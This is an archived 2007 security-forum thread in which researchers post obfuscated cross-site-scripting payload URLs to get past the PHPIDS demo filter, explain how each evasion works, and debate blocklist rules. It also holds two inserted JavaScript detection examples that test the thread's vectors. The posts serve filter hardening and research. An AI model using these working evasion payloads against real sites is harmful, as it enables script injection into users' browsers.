Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Current Page: 2 of 3
Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 05, 2007 02:59AM

@Kishor: We definitely should think about a way to persist the gathered knowledge in a more usable and comprehensive way. Let's chat about this topic the next days please!

@all: Awesome vectors again - I'm starting to repeat myself ;) I am just fixing the issues...

Please consider reading the last group post about the future of the PHPIDS - I am very interested in what you guys think about this current arms race.

http://groups.google.de/group/php-ids/msg/b4008196f38bcb15

Greetings,
.mario

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: sirdarckcat
Date: July 05, 2007 03:39AM

.mario: your response time is amazing! :D, you fix the issues really fast :P

The link you give is just for your reply, the whole thread is:
http://groups.google.de/group/php-ids/browse_thread/thread/f689a9c8cc934867/9a59ea6557f36bd0#9a59ea6557f36bd0
I'll post there my opinion :)

New javascript vector:
http://demo.php-ids.org/?test=a%3D0%7C%7Ceval%7C%7C0%3Bb%3D0%7C%7Cunescape%7C%7C0%3Ba%28b%28location%29%29#%0d%0aalert%28%22xss%22%29%3B

Flaw in SQL detection (why just uppercase?):
http://demo.php-ids.org/?test=%27%20or%20%27%27%3D%27

Greetz!!



Edited 1 time(s). Last edit at 07/05/2007 04:16AM by sirdarckcat.

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: ma1
Date: July 05, 2007 06:37AM

@sirdarckcat:
very nice idea on the full URL broken with newline (just %0A suffices, no need for %0D) :)

If somebody still wonders why it works, it has something to do with my klingon: joke at the beginning of this thread...
http: - parsed as a valid ECMA262 label
//host:port/path/...#...[newline] - C++ style comment opener
yourPayloadHere() - :D
So we can do also
eval(unescape(document.URL))
eval(unescape(document.documentURI))
and if injected in a HTML event handler,
eval(unescape(this.ownerDocument.URL))

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 07/05/2007 06:40AM by ma1.

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 05, 2007 06:48AM

@sirdarckcat: Thx - both issues are fixed. I will enhance the internal converters to deal with the concatenation and linebreak issues this evening.

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: ma1
Date: July 05, 2007 08:24AM

@mario: let us know when it's ready for another round, then ;)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 05, 2007 01:13PM

@ma1: will do for sure ;)

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 05, 2007 03:10PM

@all: Let's dance again - new rules, new converter!

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Martin
Date: July 05, 2007 03:21PM

Was somewhat pleased with:

http://demo.php-ids.org/?test=l=%200%20||%20'str',m=%200%20||%20'sub',x=%200%20||%20'al',y=%200%20||%20'ev',g=%200%20||%20'tion.h',f=%200%20||%20'ash',k=%200%20||%20'loca',d=%20(k)%20%2B%20(g)%20%2B%20(f),a=0%20||%20(y)%20%2B%20(x),b=1[a](d),c=0%20||%20(m)%20%2B%20(l),1[a](b[c](1));#alert(1)

:)

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: sirdarckcat
Date: July 06, 2007 12:18AM

Hi

very good, this was a little harder :P
http://demo.php-ids.org/?test=_%3Deval%2C__%3Dunescape%2C___%3Dlocation%2C_%28__%28___%29%29#%0aalert(%22xss%22%29

Greetz!!



Edited 1 time(s). Last edit at 07/06/2007 12:19AM by sirdarckcat.

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Martin
Date: July 06, 2007 01:52AM

Awesome use of _ as variable names - v. cool indeed!

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: ma1
Date: July 06, 2007 04:28AM

Martin Wrote:
-------------------------------------------------------
> Awesome use of _ as variable names

On the contrary, I'm quite surprised that underscore was not already recognized as a valid identifier character: /\w/ matches it (as a word letter), and it's valid in many programming languages.

JS can actually use slightly more exotic identifiers, but I'll keep them for later ;)

In the meanwhile, now you catch "location" (in latest sirdarckcat vector), but looks like someone didn't read carefully my previous post ;)

http://demo.php-ids.org/?test=_=eval,__=unescape,___=document.URL,_(__(___))#%0Aalert(1%29

Oh, the madness of enumerating badness ;)

BTW, you know that all through this carousel, I never had to adjust NoScript's Anti-XSS filter for catching anything new?
ATM I'm just optimizing for speed and using the extra wisdom acquired in this thread to release constraints :)
I'm between 0 and 30 millisecs for complex URLs. Have you got any benchmark for (PHP|NET)IDS?

Cheers

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript
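As an added example (not code from this thread, PHPIDS or NoScript), here is the normalisation and check a filter needs for the shape ma1 describes above: decode the request, then look for a script that evaluates its own decoded URL with the payload parked after a newline in the fragment. The vector URLs are the ones posted in this thread, used only as test input; the example.test URL is constructed. The last vector is the `$=document,$=$.URL` alias posted further down the thread, included because it shows ma1's "enumerating badness" point: it slips past the token list, while the fragment-newline check still fires.

```javascript
// Added example: URL normalisation plus the "eval your own URL, payload after a
// newline in the fragment" check discussed in this thread. Not PHPIDS/NoScript code.

// Byte-wise percent-decoding (ASCII only; multibyte UTF-8 would need a
// TextDecoder pass, omitted here).
function decodeOnce(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Decode until the string stops changing (bounded), so double encoding such as
// %2528 -> %28 -> "(" is undone before any pattern is applied.
function fullyDecode(s) {
  let cur = s;
  for (let i = 0; i < 4; i++) {
    const next = decodeOnce(cur);
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Raw query and fragment of a URL; either may be empty.
function splitUrl(url) {
  const hash = url.indexOf('#');
  const head = hash < 0 ? url : url.slice(0, hash);
  const fragment = hash < 0 ? '' : url.slice(hash + 1);
  const q = head.indexOf('?');
  const query = q < 0 ? '' : head.slice(q + 1);
  return { query, fragment };
}

// The token list the thread kept extending: first "location", then
// document.URL, document.documentURI and this.ownerDocument.URL. Aliases such
// as "$=document,$=$.URL" are not on it, which is the limit of this approach.
const URL_SOURCES = /\b(?:location|document\.URL|documentURI|ownerDocument\.URL)\b/;
const EVAL_SINK = /\beval\b/;
// "http:" parses as a label and "//host/path?query#" as a line comment, so the
// first statement actually run is whatever follows a newline in the fragment.
const CALL_AFTER_NEWLINE = /[\r\n]\s*[A-Za-z_$][\w$]*\s*\(/;

function analyse(url) {
  const { query, fragment } = splitUrl(url);
  const q = fullyDecode(query);
  const f = fullyDecode(fragment);
  const findings = [];
  if (EVAL_SINK.test(q) && URL_SOURCES.test(q)) findings.push('eval-of-own-url');
  if (/[\r\n]/.test(f)) findings.push('newline-in-fragment');
  if (CALL_AFTER_NEWLINE.test(f)) findings.push('call-after-newline-in-fragment');
  return findings;
}

// Sample inputs: the three vector URLs and the Wikipedia URL are from this
// thread; the example.test URL is constructed.
const SAMPLES = {
  sdcLocation: 'http://demo.php-ids.org/?test=a%3D0%7C%7Ceval%7C%7C0%3Bb%3D0%7C%7Cunescape%7C%7C0%3Ba%28b%28location%29%29#%0d%0aalert%28%22xss%22%29%3B',
  ma1DocumentUrl: 'http://demo.php-ids.org/?test=_=eval,__=unescape,___=document.URL,_(__(___))#%0Aalert(1%29',
  ma1DollarAlias: 'http://demo.php-ids.org/?test=%24%3Ddocument%2C%24%3D%24.URL%2C%24%24%3Dunescape%2C%24%24%24%3Deval%2C%24%24%24%28%24%24%28%24%29%29#%0Aalert%28%27$$$%20PECUNIA%20NON%20OLET%20$$$%27%29',
  benignPath: 'http://en.wikipedia.org/wiki/Heroes_(TV_series%29',
  benignQuery: 'http://www.example.test/index.php?id=42&page=%32#section-2',
};

for (const [name, url] of Object.entries(SAMPLES)) {
  console.log(name.padEnd(16), analyse(url).join(', ') || '(clean)');
}
```

The decode-until-stable loop is the part worth keeping whatever the rule set: every vector in this thread was posted percent-encoded, and a matcher run before decoding sees only `%28`, `%27` and `%0a`. The `eval-of-own-url` rule is the token list that keeps needing additions; the fragment-newline rule is structural and does not care what the sink was called.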

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 06, 2007 06:02AM

Fixed - and looking forward to the 'later' ;)

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 06, 2007 07:29AM

sirdarckcat Wrote:
-------------------------------------------------------
> Ronald:
>
> The following chars are indeed used commonly in
> legal requests:
>
> [
> ]
> +
> =
>
> (+ means space, = is used for GET fields, [] is
> used for multiple choices in a )
>
> :)

> Greetz!!

I said in the query part; as I said, no good request query has these in it. That is why I block all these kinds of request URI fiddling.

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 06, 2007 07:32AM

.mario Wrote:
-------------------------------------------------------
> @Ronald: Jep - but what about POST?


Most IDS systems detect upon the GET request, because if you can post something it is already too late. Everything posted should be encoded in any case, without exception.

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: thornmaker
Date: July 06, 2007 08:37AM

I wish you wouldn't fix them so fast .mario! I had to create my own vulnerable php page so I could dissect (fully appreciate) some of these new vectors :)

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: sirdarckcat
Date: July 06, 2007 08:45AM

Don't worry thornmaker, here is a new one:

http://demo.php-ids.org/?test=%281%3Feval%3A0%29%281%3F%281%3Feval%3A0%29%280%3F1%3A%27unesca%27%2B%281%3F%27pe%27%3A0%29%2B%280%3F1%3A%27%28loca%27%2B%281%3F%27tion%29%27%3A0%29%29%29%3A0%29#%0aalert%28%22xss%22%29;

:P greetz!!

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: thornmaker
Date: July 06, 2007 09:09AM

thanks sirdarckcat :) I got that one before .mario did! and quite a clever one too

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 06, 2007 09:26AM

@ma1: Fixed

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: kishord
Date: July 06, 2007 12:43PM


Kishor Was Here!


Hmmm, looks like once you are inside script tag, you rule the world!

Web Application Security Journ(ey)al

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: sirdarckcat
Date: July 06, 2007 01:18PM

Interesting, RegExp.source :P

here is an incomplete vector, I didn't have time to implement it in the "location" way..

http://demo.php-ids.org/?test=___%3D1%3F%27ert%28123%29%27%3A0%2C_%3D1%3F%27al%27%3A0%2C__%3D1%3F%27ev%27%3A0%2C1%5B__%2B_%5D%28_%2B___%29

anyway it shows an alert :P

Greetz!!

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: ma1
Date: July 06, 2007 03:34PM

kishord Wrote:
-------------------------------------------------------
> > Kishor Was Here!
>
> Hmmm, looks like once you are inside script tag,
> you rule the world!

Oh yeah!


Disclaimer & credits: original disclosure and flattering proof of concept courtesy of elio
Warning: if you use NoScript, you'll need to allow a ton of assorted junk, included google analytics: the first ad-sponsored XSS? :D


--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 06, 2007 03:40PM

This is exactly what I meant:
http://demo.php-ids.org/?test=___%3D1%3F%27ert%28123%29%27%3A0%2C_%3D1%3F%27al%27%3A0%2C__%3D1%3F%27ev%27%3A0%2C1%5B__%2B_%5D%28_%2B___%29

This will never happen in a legitimate query and thereby this can be detected very quickly with all combinations of: ( = , ' " : ( ) [ ])

I personally never saw queries like this, did you?

index.php?id=' // illegal
index.php?id=f=b // illegal
index.php?id=( // illegal
index.php?id=< // illegal
index.php?id=> // illegal
index.php?id=^ // illegal
index.php?id=& // illegal
index.php?id=$ // illegal
index.php?id=~ // illegal
index.php?id=` // illegal

Know why? Because they are unsafe chars and should be detected in the first IDS round, because they are used to pentest a system first in order to refine the injection later.

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: ma1
Date: July 06, 2007 04:04PM

Ronald Wrote:
-------------------------------------------------------
> This is exactly what I meant:
> http://demo.php-ids.org/?test=___%3D1%3F%27ert%281
> 23%29%27%3A0%2C_%3D1%3F%27al%27%3A0%2C__%3D1%3F%27
> ev%27%3A0%2C1%5B__%2B_%5D%28_%2B___%29
>
> This will never happen in a legitimate query and
> thereby this can be detected very quickly with all
> combinations of: ( = , ' " : ( ) [ ])
>
> I personally never saw a queries like this, did
> you?

I can't see anything illegal in that query, it's all urlencoded:
test=___%3D1%3F%27ert%28123%29%27%3A0%2C_%3D1%3F%27al%27%3A0%2C__%3D1%3F%27ev%27%3A0%2C1%5B__%2B_%5D%28_%2B___%29

BTW, if I was an admin of this board, I would obviously see a lot of legitimate HTTP requests like that, especially in the traffic related to the "So it begins" thread.

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 06, 2007 04:31PM

@all: nice ones again... and fixed :)

@Kishord: Wow. I'm speechless. What is that?

@Ronald: I agree when talking about GET Requests. Maybe we should consider doing a before-filter validation when the request type is GET to add initial impact when spiced with illegal characters.

Grx
.mario

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: ma1
Date: July 06, 2007 04:50PM

.mario Wrote:
-------------------------------------------------------
> @Ronald: I agree when talking about GET Requests.

So these are all illegal, right?

http://en.wikipedia.org/wiki/Heroes_(TV_series%29

http://kb.mozillazine.org/Label%3D%22%26blockImageCmd._label%3B%22

http://developer.mozilla.org/en/docs/Core_JavaScript_1.5_Reference:Global_Functions:eval

And I didn't even add any query string :)

As for the tilde character, ~, maybe you're too young to remember the time when most web URLs contained one (especially on .edu sites), because it's a Unix shortcut for a user's home directory.

Finally, ?param=& is quite common and legal, since it's sent every time an optional field is left empty in a form.

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 07/06/2007 05:17PM by ma1.

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 06, 2007 05:10PM

http://www.ietf.org/rfc/rfc1738.txt
http://www.ietf.org/rfc/rfc1808.txt
http://gbiv.com/protocols/uri/rfc/rfc3986.html#collected-abnf

K - I agree.
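Added example, not from the thread, PHPIDS or NoScript: the two rules this exchange is about, run side by side. Rule 1 is my reading of Ronald's lists, flagging a decoded request-URI that contains any of ' " ( ) [ ] : < > ^ $ ~ ` (his `=`, `&` and `,` are left out, since every form submission contains them). Rule 2 checks only that the URL is syntactically valid under the RFC 3986 collected ABNF Ronald links to. Inputs are the three URLs ma1 posted, a `~` home-directory URL and an empty optional form field (both constructed), and the demo vector Ronald quoted.

```javascript
// Added example: character blocklist versus RFC 3986 syntax validity over the
// URLs from this exchange. Not PHPIDS or NoScript code.

// Byte-wise percent-decoding (ASCII only).
function decodeOnce(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Rule 1: "no legitimate request-URI contains these" (decoded path + query).
const BLOCKLIST = /['"()\[\]:<>^$~`]/;

// Request-URI = path + "?" + query, i.e. everything after the authority up to "#".
function requestUri(url) {
  const m = /^[A-Za-z][A-Za-z0-9+.-]*:\/\/[^/?#]*([^#]*)/.exec(url);
  return m ? m[1] : url;
}

function blocklistHit(url) {
  return BLOCKLIST.test(decodeOnce(requestUri(url)));
}

// Rule 2: syntactic validity per RFC 3986. pchar = unreserved / pct-encoded /
// sub-delims / ":" / "@"; path also allows "/", query and fragment allow "/" "?".
// The authority is simplified to a character check.
const PATH_RE = /^(?:[A-Za-z0-9\-._~!$&'()*+,;=:@/]|%[0-9A-Fa-f]{2})*$/;
const QUERY_RE = /^(?:[A-Za-z0-9\-._~!$&'()*+,;=:@/?]|%[0-9A-Fa-f]{2})*$/;
const AUTHORITY_RE = /^(?:[A-Za-z0-9\-._~!$&'()*+,;=:@\[\]]|%[0-9A-Fa-f]{2})*$/;
const URI_RE = /^[A-Za-z][A-Za-z0-9+.-]*:\/\/([^/?#]*)([^?#]*)(?:\?([^#]*))?(?:#(.*))?$/;

function rfc3986Valid(url) {
  const m = URI_RE.exec(url);
  if (!m) return false;
  const [, authority, path, query = '', fragment = ''] = m;
  return AUTHORITY_RE.test(authority) && PATH_RE.test(path)
    && QUERY_RE.test(query) && QUERY_RE.test(fragment);
}

function classify(url) {
  return { rfcValid: rfc3986Valid(url), blocklistHit: blocklistHit(url) };
}

// Sample inputs: ma1's three URLs and the demo vector are from the thread;
// homeDir and emptyField are constructed.
const SAMPLES = {
  wikipedia: 'http://en.wikipedia.org/wiki/Heroes_(TV_series%29',
  mozillazine: 'http://kb.mozillazine.org/Label%3D%22%26blockImageCmd._label%3B%22',
  mdc: 'http://developer.mozilla.org/en/docs/Core_JavaScript_1.5_Reference:Global_Functions:eval',
  homeDir: 'http://www.example.edu/~jdoe/index.html',
  emptyField: 'http://www.example.test/signup?name=&email=jdoe%40example.test',
  vector: 'http://demo.php-ids.org/?test=___%3D1%3F%27ert%28123%29%27%3A0%2C_%3D1%3F%27al%27%3A0%2C__%3D1%3F%27ev%27%3A0%2C1%5B__%2B_%5D%28_%2B___%29',
};

for (const [name, url] of Object.entries(SAMPLES)) {
  const { rfcValid, blocklistHit: hit } = classify(url);
  console.log(name.padEnd(12), 'rfc3986:', rfcValid, ' blocklist:', hit);
}
```

Run it and both rules give the same verdict for the demo vector and for four of the five legitimate URLs: everything is RFC-valid (the vector is entirely percent-encoded, as ma1 points out), and the blocklist fires on the Wikipedia parentheses, the mozillazine quotes, the MDC colons and the tilde just as it does on the vector. Neither "contains an odd character" nor "is syntactically valid" separates the two sets; the separation has to come from decoding and then looking at what the value would do in its sink context, which is what the rest of the thread is about.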

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: kishord
Date: July 07, 2007 01:25AM

@Mario

Hi, Here is an explanation of the vector:

evil=/ev/.source+/al/.source
//---variable evil now contains string 'eval'

changeProto=/Strin/.source+
/g.prototyp/.source+
/e.ss=/.source+
/Strin/.source+
/g.prototyp/.source+
/e.substrin/.source+
/g/.source;

//--- changeProto now contains string 'String.prototype.ss=String.prototype.substring'
// Thus now ss is same as substring for any string


hashCod=/documen/.source+
/t.locatio/.source+
/n.has/.source+
/h/.source;

// hashCod now contains string 'document.location.hash'

7[evil](changeProto);
// In turn, the statement above executes eval(changeProto)

hash=7[evil](hashCod);

// In turn, the statement above executes hash=eval(hashCod)
// Thus hashCod now holds a string "#alert('Kishor Was Here!')"

cod=hash.ss(1);

// Since we added ss to String class, cod becomes = "alert('Kishor Was Here!')"

7[evil](cod);
// We use the eval to evaluate cod


In the link of the POC I needed to rename several things e.g. hash to hsh


Hope it was simple ;)

@Mario
When you write all this up, consider using word 'JavasCrypt' in the title
if it doesn't sound like a bad idea.

Web Application Security Journ(ey)al

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 07, 2007 04:04AM

@Kishord: Thanks for the explanation - JavasCrypt matches the properties of that vector ;) I was also thinking about 'The new dawn of filter evasion' :D

Greetings,
.mario

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: ma1
Date: July 07, 2007 04:45AM

http://demo.php-ids.org/?test=%24%3Ddocument%2C%24%3D%24.URL%2C%24%24%3Dunescape%2C%24%24%24%3Deval%2C%24%24%24%28%24%24%28%24%29%29#%0Aalert%28%27$$$%20PECUNIA%20NON%20OLET%20$$$%27%29

... && JavasCrypt.votes++ //:)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: sirdarckcat
Date: July 07, 2007 08:29AM

Hi!

Today I'll introduce the use of XML Predicates in JavaScript to the vectors.

I was trying to leave this to the end, but..

http://demo.php-ids.org/?test=y%3D%3Ca%3Ealert%3C/a%20%3E%3Bcontent%5By%5D%28123%29

The code:
y=<a>alert</a >;content[y](123)

The XML Predicate:
y=<a>alert</a >;

I'm running out of ideas :P, this filter is a pretty hard obstacle to any attacker, congratulations mario :D

Greetz!!

PS. content=window
JavasCrypt rulz :P



Edited 1 time(s). Last edit at 07/07/2007 08:32AM by sirdarckcat.
